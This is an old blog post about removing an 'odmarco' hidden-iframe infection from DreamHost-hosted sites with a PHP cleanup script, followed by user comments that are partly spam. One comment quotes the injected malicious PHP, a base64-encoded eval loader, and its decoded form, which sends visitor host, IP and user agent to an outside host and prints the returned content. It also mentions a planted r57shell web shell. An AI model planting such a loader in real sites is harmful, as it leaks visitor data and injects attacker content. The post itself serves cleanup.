Cleaning "infected" file from the odmarco string
I use DreamHost for quite some sites, both my own and of friends. Recently I got informed that one of my sites was triggering a warning in anti-virus software and when I went to investigate, it turned out quite a few sites got hit by an annoying script that inserts a hidden iframe. Removing all those by hand would be an annoying job, so I decided to automate it. Given that I don't know much shell scripting but have a firm knowledge of PHP, I decided to give that a go.
First of all, let's look at the hack. At this point I am unsure what exactly caused so many of my files to contain the odmarco string. It looks like quite some people on DreamHost got hit by this problem, so I am guessing a vulnerable script on one of their servers caused this. Now, I should blame myself as well, because apparently I didn't take notice to a lot of files in my websites being writable by the server. It's no excuse, but a lot of the sites that I have are very old sites, where I definitely didn't pay as much attention to such details as I do now.
Anyway, from a comment on siteadvisor I learned that the script called in the iframe is trying to abuse an exploit in Adobe Acrobat. Though I hate all stuff like this, I hate exploits more than mere referrer spam injection, so I felt I needed to take care of this quickly, even if a lot of the sites are hardly maintained anymore. So I sat down to hack up a little PHP script that would remove the offending string. Why PHP? Simple, it's the only language I know good enough to hack something like this up in a short time.
After some hacking around I came up with this script. It's not perfect, but it does the job and it does it well, so I'm happy. Anyone interested, feel free to use this script to clear up the mess in your site. It's meant to be run from the command line, inside the directory that you want to (recursively) clean. What I did was put it in the homedir on DreamHost, and then go into a directory that needed cleaning and issue the command:
/usr/local/php5/bin/php ../clear_odmarco.php
As you notice, at DreamHost you need to explicitly specify the php5 path because for some reason, the "php" command still defaults to php4. Then I put in a relative path to the clear_odmarco.php file (you could put the full path if you want).
April 12, 2009 - tags: odmarco, script, virus, malware, clear, dreamhost, php
Comments
Silvano Girardi Jr.: I had the same problem too. But it wasn't only the iframe, which for me was pointing to google- stats.com instead.I posted about it on my blog, but it is in portuguese: http://www.silvano.pro.br/2009/04/10/recomeco/
Let me list these items in English here:
1 - the hidden frame
2 - .htaccess modified to redirect all search engine bots to the cracker's website
3 - malicious PHP code generating random links
eval(base64_decode(’JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs=’));
the decode results in:
$ch=curl_init(”http://usr-52. adsl .md/inc2.php?host=”.urlencode($_SERVER["HTTP_HOST"]).”&ip=”.urlencode($_SERVER["REMOTE_ADDR"]).”&agent=”.urlencode($_SERVER["HTTP_USER_AGENT"])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;
4 - lots of pages modified with the malicious cod on the top
The variable name and value changes for every file.
5 - there was a wp-content/cache.php file, which was actually a php shell called r57shell
6 - there was a big binary file called "core" which I didn't know what it was about.
There were probably more changes, so I decided to get rid of just everything and start from scratch.
Btw, I lost my pagerank too
Regards
April 13, 2009
GIF_Tom: Hi, we seem to be having the same problem over here with Odmarco and Dream Host. Funny enough when we asked them for support they directed us to your site. We downloaded the script but we seem to be having trouble executing it. Can you dumb down your explanation for us novice folks. Thanks so much!
May 5, 2009
left: Hi GIF_Tom,Could you explain what problems you are having? Any errors? Or what exactly is unclear? I'd be glad to help you. Feel free to e-mail me via the 'who' option in the menu
Stefan
May 6, 2009
Bill: You can scrub the iframe from html files quickly from the command line with this oneliner.find . -name '*.html' -print0 | xargs -0 perl -pi -e 'undef $/; s#
May 8, 2009
GIF_Tom: Hi Left, I went ahead and wrote you an email further explaining my issues. Just wanted to check in and see if you received it. It was very detailed. Any help you can give me on this subject will be great. If you did not receive it let me know and I will repost it in the comment field.GIF_Tom
May 9, 2009
lucia: Thank you, thank you, thank you.Odmarco changed the name of their image. So, I changed the string to be eliminated and named the script "nameofscript.com".
Then, I loaded the script to my top directory, and ran "http://mydomain.com/nameofscript.php" This worked like a charm. Even the command line averse can do it.
May 29, 2009
Chris Ramsey: You sir, are a life saver. As a PHP developer I should have thought about writing a script to do this but it never crossed my mind.Thanks so much for this!
May 30, 2009
Jack: Hi,This is a fantastic little script thankyou ever so much for this! It worked on 4 websites i have hosted with dreamhost but one gave me this error:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/promotions7/domainnamehere.com/clear_odmarco.php on line 7
I think it may be something to do with php4/php5 but im not sure how to specify the path for php5. If you could help i would be most grateful.
Many Thanks
Jack
June 2, 2009
left: Hi Jack,The error does look very much php4/php5 related. You can specify it to run php5 by using the full path as I mentioned it in my article (/usr/local/php5/bin/php)
Stefan
June 2, 2009
Jack: Hi Stefan,Thanks for the quick response. I should of mentioned thaat i was unable to get the script to work via custom command from my ftp (filezilla) as it keep reporting that "500 /USR/LOCAL/PHP5/BIN/PHP not understood".
I managed to enter the script into the directory and then run it via my browser "http://mydomainhere.com/clear_odmarco.php". This worked fine on all of my other sites! What am i doing wrong?
After being hit first in April i was hit once again last night...what a pest! Thank goodness for your post...
Kind Regards
- Jack
June 2, 2009
left: The script is meant to be run using an ssh connection into the server. via FTP this will not work. If you run it via the browser, it will probably be related to the fact that your domain runs php4. Try connection through ssh (using a client such as PuTTy for Windows). Be careful with what you do, obviously. The instructions above should suffice once you connect through ssh.
June 2, 2009
Dinesh: Hi,The link to the script file is broken. Can I please have the file. I have the same problem too and I'm on DH.
June 22, 2009
Dinesh: Aah well never mind.. I found d script from Google cache... June 22, 2009
Gordon: The CORE file is not a virus. It is part od Dreamhost's automation system!!! Do Not mess with it!!!----------------------
Thank you for this script.
I saw that your code link is dead, here's a link to a modified version I used to clean up an attack on Dreamhost (6/22/09):
http://forum.animejutsu.com/index.php?topic=116.0
June 23, 2009
Mik: Hi, good job on writing a script to help sort this out. Unfortunately the link to the script still seems to be broken...Mik.
July 23, 2009
Tim Eash: One of our sites was attacked with this "odmarco" infection, it was is running os commerce. I was able to use the script from the site and executed it and it works almost with out flaw. However, I am having a problem cleaning out the 4000 files, because when the script cleans, it leaves behind a "white spaces".What I mean by white spaces are I believe line breaks. I am not sure. If I hope the cleaned file with notepad I see "a square", but if I use an HTML editor to open it up, I see a newline.
But the new line is causing a problem because it's considered "output" and so my session is jacked.
"Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent"
Any idea's as to how I can scrub the infection and not leave a newline at the top of each script?
Thanks,
Tim
September 30, 2009
local info source Eagleville Times: This is very informative post regarding software and their errors. It helps a lot to the PC users to solve this problem. Thanks for providing info regarding this important topic. June 5, 2011
craigslist louisville: i like your post you do good effort to make it more valuable.thanks for sharing.
July 5, 2011
Craigslist Montreal pets for sale: Interesting post.i have never face this problem but now i can do it and fix this script easily with the help of your article.this post is important.i learn many things from it.thanks for sharing.August 8, 2011
honda cars: you can not explain your actual problem to you place explain your problem in your article .thanksSeptember 26, 2011
internet dating: Definitely a very wonderful post...I really appreciate this article its has necessary updates and information..Thanks for posting!October 14, 2011
craigslist Austin jobs: this problem is very common and mostly peoples face.you discus a good topic in this post.i like to read informative blogs and this blog is also so good and helpful.thanks for taking time to discus this topic..November 16, 2011
nysqtdh: The script is meant to be run using an ssh connection into the server. via FTP this will not work. If you run it via the browser, it will probably be related to the fact that your domain runs php4. December 23, 2011
music production: This is such a great knowledge. Thanks for this valuable information. You have a lot of good ideas and concepts and lots of great information and inspirations. Keep on posting. January 1, 2012
treat cracked heel: Dry cracked heels are a sign of lack of attention to foot care rather than just overexposure or lack of moisturizing. Cracked heels are a common foot problem that are often referred to as heel fissures.January 21, 2012
coach outlet online: If you buy Coach items at thecoach outlet online
store, the goods will be sent out within 24 hours after confirming your payment and arrive to your door within 7 work days.No one can deny the shopping at the
coach factory outlet
is satisfactory. For the low prices and good quality.
http://www.coachoutletonlinecoachday.com
January 29, 2012
coach outlet: coach outlet handbags You can not just save your cash but also your time inside a convenient way to obtain the exact same bags product and do not be concerned the shippment of one's products.The coach outlet store online are utilized for formal event in company area that will display your excellent taste.Not only does a briefcase make is easier to carry things.January 29, 2012
ugg australia discount code: people are enjoying and take some mind refreshment in this niteFebruary 1, 2012
Hire Link Builder: Hi, I just stumbled upon your post,a good view point. Hey your post left me quenching for more.February 3, 2012
SEO India Services: I wanted to thank you for this great read!! I definitely enjoying every little bit of it I have you bookmarked to check out new stuff you post.February 3, 2012
CRM: You made some good points .I did a little research on the topic and found that most people agree with your blog. Thanks.February 3, 2012
calling international: Good post....thanks for sharing.. very useful for me i will bookmark this for my future needed.thanks for a great source.February 3, 2012
Upcoming events
06-02-2012: D-Day 17-02-2012: Techademy Trainingday February 23-02-2012: Zend Webinar: Git for Subversion Users